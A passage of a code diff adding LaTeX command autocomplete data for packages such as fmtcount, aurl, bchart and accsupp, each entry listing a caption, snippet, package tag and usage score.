snippet: '\\boolean{$1}', + meta: 'fmtcount-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'fmtcount-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'fmtcount-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'fmtcount-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'fmtcount-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'fmtcount-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'fmtcount-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'fmtcount-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'fmtcount-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'fmtcount-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'fmtcount-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fmtcount-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'fmtcount-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'fmtcount-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'fmtcount-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'fmtcount-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fmtcount-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'fmtcount-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'fmtcount-cmd', + score: 0.0063276692758974925, + }, + ], + aurl: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'aurl-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'aurl-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'aurl-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'aurl-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'aurl-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'aurl-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'aurl-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'aurl-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'aurl-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'aurl-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'aurl-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'aurl-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'aurl-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'aurl-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'aurl-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'aurl-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'aurl-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'aurl-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'aurl-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'aurl-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'aurl-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'aurl-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'aurl-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'aurl-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'aurl-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'aurl-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'aurl-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'aurl-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'aurl-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'aurl-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'aurl-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'aurl-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'aurl-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'aurl-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'aurl-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'aurl-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'aurl-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'aurl-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'aurl-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'aurl-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'aurl-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'aurl-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'aurl-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'aurl-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'aurl-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'aurl-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'aurl-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'aurl-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'aurl-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'aurl-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'aurl-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'aurl-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'aurl-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'aurl-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'aurl-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'aurl-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'aurl-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'aurl-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'aurl-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'aurl-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'aurl-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'aurl-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'aurl-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'aurl-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'aurl-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'aurl-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'aurl-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'aurl-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'aurl-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'aurl-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'aurl-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'aurl-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'aurl-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'aurl-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'aurl-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'aurl-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'aurl-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'aurl-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'aurl-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'aurl-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'aurl-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'aurl-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'aurl-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'aurl-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'aurl-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'aurl-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'aurl-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'aurl-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'aurl-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'aurl-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'aurl-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'aurl-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'aurl-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'aurl-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'aurl-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'aurl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'aurl-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'aurl-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'aurl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'aurl-cmd', + score: 0.00530510025314411, + }, + ], + bchart: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bchart-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bchart-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'bchart-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'bchart-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'bchart-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bchart-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'bchart-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bchart-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'bchart-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'bchart-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'bchart-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'bchart-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'bchart-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'bchart-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'bchart-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bchart-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'bchart-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bchart-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'bchart-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'bchart-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'bchart-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bchart-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'bchart-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'bchart-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bchart-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'bchart-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'bchart-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'bchart-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'bchart-cmd', + score: 0.2864294797053033, + }, + ], + pdftexcmds: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdftexcmds-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdftexcmds-cmd', + score: 0.002958865219480927, + }, + ], + l3keys2e: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'l3keys2e-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'l3keys2e-cmd', + score: 0.2864294797053033, + }, + ], + xfor: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xfor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xfor-cmd', + score: 0.021170869458413965, + }, + ], + accsupp: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'accsupp-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'accsupp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'accsupp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'accsupp-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'accsupp-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'accsupp-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'accsupp-cmd', + score: 0.021170869458413965, + }, + ], + trig: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'trig-cmd', + score: 0.008565354665444157, + }, + ], + rerunfilecheck: [ + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'rerunfilecheck-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'rerunfilecheck-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 